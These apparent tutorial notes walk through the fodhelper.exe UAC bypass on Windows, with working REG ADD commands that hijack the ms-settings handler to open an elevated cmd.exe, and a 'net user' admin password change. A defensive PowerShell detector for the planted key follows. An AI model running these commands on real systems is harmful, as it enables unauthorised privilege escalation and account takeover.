UAC Bypass

User Account Control (UAC)

Vulnerable binary used as the example: fodhelper.exe

  • Gather information about the executable's integrity level and permission requirements.

    Tool: sigcheck.exe (Sysinternals)

    • In cmd, cd into the SysinternalsSuite directory and run: sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

    • The output shows that administrator rights are required and that autoElevate is true.

  • Gather information about how this executable interacts with the file system and the Windows registry.

    Tool: Procmon.exe (Process Monitor) from Sysinternals

    • Open Procmon.exe, start fodhelper.exe, and add the filters below:

    • Filter: Process Name, is, fodhelper.exe, Include

    • Filter: Operation, contains, Reg, Include

    • Filter: Result, is, NAME NOT FOUND, Include

    • Filter: Path, contains, HKCU, Include

    • Now apply the filters and look for an interesting path that can be modified. For example, HKCU:\Software\Classes\ms-settings\shell\open\command is worth checking.

    • Now change the Path filter and remove the Result filter: Path, contains, ms-settings\shell\open\command, Include

    • Check whether the process can successfully access that key in some other hive; the results give further clues. When HKCU:\Software\Classes\ms-settings\shell\open\command is not found, it falls back to the same path under HKCR, which exists, and that access succeeds.

    • Because the executable looks for HKCU:\Software\Classes\ms-settings\shell\open\command first, and we have the necessary permission to edit it, that path can be modified.

    • Add this key with the REG utility in cmd: REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command

    • Now restart fodhelper.exe and add the first four filters again.

    • The vulnerable executable now looks for DelegateExecute in the newly added key.

    • Add DelegateExecute with an empty value in cmd: REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

    • Restart fodhelper.exe again and apply the 1st, 2nd and 4th filters.

    • This time the lookup is successful, but because DelegateExecute is empty it also looks for the (Default) entry value of the Shell\Open\command registry key. The (Default) entry is created with a null value automatically when any registry key is added.

    • Replace the empty (Default) value with an executable of our choice, cmd.exe, in cmd: REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

    • Exploit

      • Restart fodhelper.exe; it will now open cmd.exe automatically at high integrity level.

      • To check whether high integrity was achieved, try to change the admin password: net user admin Ev!lpass

    • Automation tool
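Defensive counterpart, added here and not part of the original notes: a PowerShell function that audits every loaded user hive for the ms-settings\Shell\Open\command override the walkthrough above creates, reports the (Default) command and DelegateExecute marker, and can optionally remove the override. It goes beyond the single HKCU case by walking HKEY_USERS; the function and parameter names are my own, and it should be run from an elevated session so all loaded hives are readable.

```powershell
# Added example (not from the original notes): find the fodhelper.exe UAC-bypass
# artifact, a per-user override of the ms-settings handler that a legitimate
# install never creates. Function and parameter names are my own choice.
function Find-MsSettingsHandlerOverride {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # Remove the whole per-user ms-settings subtree when a hit is found
        [switch]$Remediate
    )

    $relative = 'ms-settings\Shell\Open\command'
    $hits = @()

    foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS') {
        $name = $hive.PSChildName
        # Writes to HKCU:\Software\Classes are stored in the per-user <SID>_Classes
        # hive (UsrClass.dat); the plain Software\Classes path is checked as well.
        if ($name -like '*_Classes') {
            $root = "Registry::HKEY_USERS\$name"
        } else {
            $root = "Registry::HKEY_USERS\$name\Software\Classes"
        }
        $keyPath = "$root\$relative"
        if (-not (Test-Path -LiteralPath $keyPath)) { continue }

        $key = Get-Item -LiteralPath $keyPath
        $hits += [pscustomobject]@{
            Hive            = $name
            Key             = $keyPath
            # (Default) is what fodhelper.exe launches once DelegateExecute is present
            Command         = $key.GetValue('')
            DelegateExecute = $key.GetValueNames() -contains 'DelegateExecute'
        }

        if ($Remediate) {
            $msSettings = "$root\ms-settings"
            if ($PSCmdlet.ShouldProcess($msSettings, 'Remove ms-settings handler override')) {
                Remove-Item -LiteralPath $msSettings -Recurse -Force
            }
        }
    }
    return $hits
}

# Usage: no output means no override was found in any loaded hive.
# Add -Remediate -WhatIf to preview removal before doing it.
Find-MsSettingsHandlerOverride | Format-Table -AutoSize
```

For ongoing detection, the same key path is the natural filter for a Sysmon Event ID 13 (registry value set) rule, since any write to it by a non-elevated process is the first step of this bypass.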